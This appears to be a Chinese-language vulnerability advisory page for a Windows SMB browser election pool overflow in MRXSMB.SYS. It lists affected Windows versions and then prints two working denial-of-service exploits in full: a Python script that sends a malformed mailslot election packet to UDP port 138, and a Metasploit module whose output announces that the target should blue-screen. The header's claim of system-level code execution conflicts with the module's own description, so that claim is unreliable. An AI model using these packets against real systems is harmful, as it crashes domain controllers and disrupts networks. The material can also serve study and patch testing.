影响版本:
Microsoft Windows XP Tablet PC Edition SP3 Microsoft Windows XP Service Pack 3 0 Microsoft Windows XP Professional x64 Edition SP3 Microsoft Windows XP Professional SP3 Microsoft Windows XP Media Center Edition SP3 Microsoft Windows XP Home SP3 Microsoft Windows XP Embedded SP3 Microsoft Windows Vista x64 Edition SP2 Microsoft Windows Vista x64 Edition SP1 Microsoft Windows Vista x64 Edition 0 Microsoft Windows Vista Ultimate 64-bit edition SP2 Microsoft Windows Vista Ultimate 64-bit edition SP1 Microsoft Windows Vista Ultimate 64-bit edition 0 Microsoft Windows Vista Home Premium 64-bit edition SP2 Microsoft Windows Vista Home Premium 64-bit edition SP1 Microsoft Windows Vista Home Premium 64-bit edition 0 Microsoft Windows Vista Home Basic 64-bit edition Sp2 X64 Microsoft Windows Vista Home Basic 64-bit edition SP2 Microsoft Windows Vista Home Basic 64-bit edition Sp1 X64 Microsoft Windows Vista Home Basic 64-bit edition SP1 Microsoft Windows Vista Home Basic 64-bit edition 0 Microsoft Windows Vista Enterprise 64-bit edition SP2 Microsoft Windows Vista Enterprise 64-bit edition SP1 Microsoft Windows Vista Enterprise 64-bit edition 0 Microsoft Windows Vista December CTP X64 Microsoft Windows Vista December CTP SP2 Microsoft Windows Vista December CTP SP1 Microsoft Windows Vista December CTP Gold Microsoft Windows Vista December CTP Microsoft Windows Vista Business 64-bit edition SP2 Microsoft Windows Vista Business 64-bit edition SP1 Microsoft Windows Vista Business 64-bit edition 0 Microsoft Windows Vista Ultimate SP2 Microsoft Windows Vista Ultimate SP1 Microsoft Windows Vista Ultimate Microsoft Windows Vista SP2 Beta Microsoft Windows Vista SP2 Microsoft Windows Vista SP1 Microsoft Windows Vista Home Premium SP2 Microsoft Windows Vista Home Premium SP1 Microsoft Windows Vista Home Premium Microsoft Windows Vista Home Basic SP2 Microsoft Windows Vista Home Basic SP1 Microsoft Windows Vista Home Basic Microsoft Windows Vista Enterprise SP2 Microsoft Windows Vista Enterprise SP1 Microsoft Windows Vista Enterprise Microsoft Windows Vista Business SP2 Microsoft Windows Vista Business SP1 Microsoft Windows Vista Business Microsoft Windows Vista beta 2 Microsoft Windows Vista Beta 1 Microsoft Windows Vista Beta Microsoft Windows Vista 3.0 Microsoft Windows Vista 2.0 Microsoft Windows Vista 1.0 Microsoft Windows Vista 0 Microsoft Windows Server 2008 Standard Edition X64 Microsoft Windows Server 2008 Standard Edition SP2 Microsoft Windows Server 2008 Standard Edition Release Candidate Microsoft Windows Server 2008 Standard Edition Itanium Microsoft Windows Server 2008 Standard Edition 0 Microsoft Windows Server 2008 R2 x64 0 Microsoft Windows Server 2008 R2 Itanium 0 Microsoft Windows Server 2008 R2 Datacenter 0 Microsoft Windows Server 2008 for x64-based Systems SP2 Microsoft Windows Server 2008 for x64-based Systems R2 Microsoft Windows Server 2008 for x64-based Systems 0 Microsoft Windows Server 2008 for Itanium-based Systems SP2 Microsoft Windows Server 2008 for Itanium-based Systems R2 Microsoft Windows Server 2008 for Itanium-based Systems 0 Microsoft Windows Server 2008 for 32-bit Systems SP2 Microsoft Windows Server 2008 for 32-bit Systems 0 Microsoft Windows Server 2008 Enterprise Edition SP2 Microsoft Windows Server 2008 Enterprise Edition Release Candidate Microsoft Windows Server 2008 Enterprise Edition 0 Microsoft Windows Server 2008 Datacenter Edition SP2 Microsoft Windows Server 2008 Datacenter Edition Release Candidate Microsoft Windows Server 2008 Datacenter Edition 0 Microsoft Windows Server 2008 SP2 Beta Microsoft Windows Server 2008 - Sp2 Enterprise X64 Microsoft Windows Server 2003 x64 SP2 Microsoft Windows Server 2003 x64 SP1 Microsoft Windows Server 2003 Web Edition SP2 Microsoft Windows Server 2003 Web Edition SP1 Beta 1 Microsoft Windows Server 2003 Web Edition SP1 Microsoft Windows Server 2003 Web Edition Microsoft Windows Server 2003 Terminal Services 0 Microsoft Windows Server 2003 Standard x64 Edition Microsoft Windows Server 2003 Standard Edition SP2 Microsoft Windows Server 2003 Standard Edition SP1 Beta 1 Microsoft Windows Server 2003 Standard Edition SP1 Microsoft Windows Server 2003 Standard Edition Microsoft Windows Server 2003 R2 web Edition 0 Microsoft Windows Server 2003 R2 Standard Edition 0 Microsoft Windows Server 2003 R2 Enterprise Edition SP2 0 Microsoft Windows Server 2003 R2 Enterprise Edition SP1 0 Microsoft Windows Server 2003 R2 Enterprise Edition 0 Microsoft Windows Server 2003 R2 Datacenter Edition SP2 0 Microsoft Windows Server 2003 R2 Datacenter Edition SP1 0 Microsoft Windows Server 2003 R2 Datacenter Edition 0 Microsoft Windows Server 2003 Itanium SP2 Microsoft Windows Server 2003 Itanium SP1 Microsoft Windows Server 2003 Itanium 0 Microsoft Windows Server 2003 Enterprise x64 Edition SP2 Microsoft Windows Server 2003 Enterprise x64 Edition Microsoft Windows Server 2003 Enterprise Edition Itanium Sp2 Itanium Microsoft Windows Server 2003 Enterprise Edition Itanium SP2 Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1 Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Microsoft Windows Server 2003 Enterprise Edition Itanium 0 Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1 Microsoft Windows Server 2003 Enterprise Edition SP1 Microsoft Windows Server 2003 Enterprise Edition Microsoft Windows Server 2003 Datacenter x64 Edition SP2 Microsoft Windows Server 2003 Datacenter x64 Edition Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1 Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Microsoft Windows Server 2003 Datacenter Edition Itanium 0 Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1 Microsoft Windows Server 2003 Datacenter Edition SP1 Microsoft Windows Server 2003 Datacenter Edition Microsoft Windows Server 2008 R2 Microsoft Windows 7 XP Mode 0 Microsoft Windows 7 Ultimate 0 Microsoft Windows 7 Starter 0 Microsoft Windows 7 Professional 0 Microsoft Windows 7 Home Premium 0 Microsoft Windows 7 for x64-based Systems 0 Microsoft Windows 7 for Itanium-based Systems 0 Microsoft Windows 7 for 32-bit Systems 0 Microsoft Windows 7 RC Microsoft Windows 7 beta Microsoft Windows 7
漏洞描述:
攻击可以让攻击者执行系统级权限执行任意代码
<*参考
*>
测试方法:
import socket,sys,struct from socket import * if len(sys.argv)<=4: sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah AD-NETBIOS-NAME""") ourip = sys.argv[1] host = sys.argv[2] srcname = sys.argv[3].upper() dstname = sys.argv[4].upper() ELEC = "\x42\x4f\x00" WREDIR = "\x41\x41\x00" def encodename(nbt,service): final = '\x20'+''.join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) + ord('A')) for i in nbt])+((15 - len(nbt)) * str('\x43\x41'))+service return final def lengthlittle(packet,addnum): length = struct.pack("<i", len(packet)+addnum)[0:2] return length def lengthbig(packet,addnum): length = struct.pack(">i", len(packet)+addnum)[2:4] return length def election(srcname): elec = "\x08" elec+= "\x09" #Be the boss or die elec+= "\xa8\x0f\x01\x20" #Be the boss or die elec+= "\x1b\xe9\xa5\x00" #Up time elec+= "\x00\x00\x00\x00" #Null, like SDLC elec+= srcname+"\x00" return elec def smbheaderudp(op="\x25"): smbheader= "\xff\x53\x4d\x42" smbheader+= op smbheader+= "\x00" smbheader+= "\x00" smbheader+= "\x00\x00" smbheader+= "\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" return smbheader def trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\MAILSLOT\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""): packetbrowser = pbrowser packetmailslot = "\x01\x00" packetmailslot+= "\x00\x00" packetmailslot+= "\x02\x00" packetmailslot+= lengthlittle(packetbrowser+namepipe,4) packetmailslot+= namepipe +"\x00" packetdatagram = "\x11" packetdatagram+= "\x02" packetdatagram+= tid packetdatagram+= inet_aton(ip) packetdatagram+= "\x00\x8a" packetdatagram+= "\x00\xa7" packetdatagram+= "\x00\x00" packetdatagramname = encodename(sname,srcservice) packetdatagramname+= encodename(dname,dstservice) smbheader= smbheaderudp("\x25") packetrans2 = "\x11" packetrans2+= "\x00\x00" packetrans2+= lengthlittle(packetbrowser,0) packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00" packetrans2+= "\x00" packetrans2+= "\x00\x00" packetrans2+= "\xe8\x03\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= lengthlittle(packetbrowser,0) packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4) packetrans2+= "\x03" packetrans2+= "\x00" andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2) lengthcalc = packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser packetfinal = packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser packetotalength = list(packetfinal) packetotalength[10:12] = lengthbig(lengthcalc,0) packetrans2final = ''.join(packetotalength) return packetrans2final def sockbroad(host,sourceservice,destservice,packet): s = socket(AF_INET,SOCK_DGRAM) s.setsockopt(SOL_SOCKET, SO_BROADCAST,1) s.bind(('0.0.0.0', 138)) try: packsmbheader = smbheaderudp("\x25") buffer0 = trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\MAILSLOT\BROWSER",srcservice=sourceservice, dstservice=destservice, pbrowser=packet) s.sendto(buffer0,(host,138)) except: print "expected SDL error:", sys.exc_info()[0] raise sockbroad(host,WREDIR,ELEC,election("A" * 410)) # -> Zing it! (between ~60->410) print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time ago...." ===================================================================== class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp #include Msf::Exploit::Remote::SMB include Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows MRXSMB.SYS _BowserWriteErrorLogEntry Pool Overflow DoS', 'Description' => %q{ This module exploits a denial of service flaw in the Microsoft Windows SMB service on versions of Windows Server 2003 that have been configured as a domain controller. By sending a specially crafted election request, an attacker can cause a pool overflow. The vulnerability appears to be due to an error handling a length value while calculating the amount of memory to copy to a buffer. When there are zero bytes left in the buffer, the length value is improperly decremented and an integer underflow occurs. The resulting value is used in several calculations and is then passed as the length value to an inline memcpy operation. Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and causes considerable damage to kernel heap memory. While theoretically possible, it does not appear to be trivial to turn this vulnerability into remote (or even local) code execution. }, 'References' => [ #[ 'CVE', '2011-XXXX' ], #[ 'OSVDB', 'XXXX' ], #[ 'MSB', 'MS11-XXX' ], [ 'URL', 'http://www.leehoosoftware.org' ' ], [ 'URL', 'http://www.leehoosoftware.org' ] ], 'Author' => [ 'Cupidon-3005', 'jduck' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11756 $' )) register_options( [ Opt::RPORT(138), OptString.new('DOMAIN', [ true, "The name of the domain that the target controls" ]) ], self.class) end def run connect_udp @client = Rex::Proto::SMB::Client.new(udp_sock) ip = Rex::Socket.source_address(datastore['RHOST']) ip_src = Rex::Socket.gethostbyname(ip)[3] svc_src = "\x41\x41\x00" # pre-encoded? name_src = Rex::Text.rand_text_alphanumeric(4+rand(10)) svc_dst = "\x42\x4f\x00" # pre-encoded? name_dst = datastore['DOMAIN'] pipe = "\\MAILSLOT\\BROWSER" election = "\x08" + # Election Request "\x09" + # Election Version "\xa8" + # election desire - Domain Master & WINS & NT "\x0f" + # Browser Protocol Major Version "\x01" + # Browser Protocol Minor Version "\x20" + # Election OS (NT Server) "\x1b\xe9\xa5\x00" + # Uptime "\x00\x00\x00\x00" + # NULL... Padding? ("A" * 410) + "\x00" # name nbdghdr = "\x11" + # DIRECT_GROUP datagram "\x02" + # first and only fragment [rand(0xffff)].pack('n') + # Transation Id (DGM_ID) ip_src + "\x00\x8a" + # Source Port (138) "\x00\xa7" + # DGM_LENGTH, patched in after "\x00\x00" # PACKET_OFFSET nbdgs = nbdghdr + half_ascii(name_src, svc_src) + half_ascii(name_dst, svc_dst) # A Trans request for the mailslot nbdgs << trans_mailslot(pipe, '', election) # Patch up the length (less the nb header) nbdgs[0x0a, 2] = [nbdgs.length - nbdghdr.length].pack('n') print_status("Sending specially crafted browser election request..") #print_status("\n" + Rex::Text.to_hex_dump(nbdgs)) udp_sock.put(nbdgs) print_status("The target should encounter a blue screen error now.") disconnect_udp end # Perform a browser election request using the specified subcommand, parameters, and data def trans_mailslot(pipe, param = '', body = '') # Null-terminate the pipe parameter if needed if (pipe[-1,1] != "\x00") pipe << "\x00" end pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct @client.smb_defaults(pkt['Payload']['SMB']) setup_count = 3 setup_data = [1, 0, 2].pack('v*') data = pipe + param + body base_offset = pkt.to_s.length + (setup_count * 2) - 4 param_offset = base_offset + pipe.length data_offset = param_offset + param.length pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION pkt['Payload']['SMB'].v['Flags1'] = 0x0 pkt['Payload']['SMB'].v['Flags2'] = 0x0 pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count pkt['Payload'].v['ParamCountTotal'] = param.length pkt['Payload'].v['DataCountTotal'] = data.length pkt['Payload'].v['ParamCountMax'] = 0 pkt['Payload'].v['DataCountMax'] = 0 pkt['Payload'].v['ParamCount'] = param.length pkt['Payload'].v['ParamOffset'] = param_offset if param.length > 0 pkt['Payload'].v['DataCount'] = body.length pkt['Payload'].v['DataOffset'] = data_offset pkt['Payload'].v['SetupCount'] = setup_count pkt['Payload'].v['SetupData'] = setup_data pkt['Payload'].v['Payload'] = data exploit = pkt.to_s # Strip off the netbios header (thx, but no thx!) exploit[4, exploit.length - 4] end def half_ascii(name, svc) ret = " " name.unpack('C*').each { |byte| ret << [0x41 + (byte >> 4)].pack('C') ret << [0x41 + (byte & 0xf)].pack('C') } left = 15 - name.length if left > 0 ret << "\x43\x41" * left end # In our case, svc is already encoded.. ret << svc ret end end
0 条评论。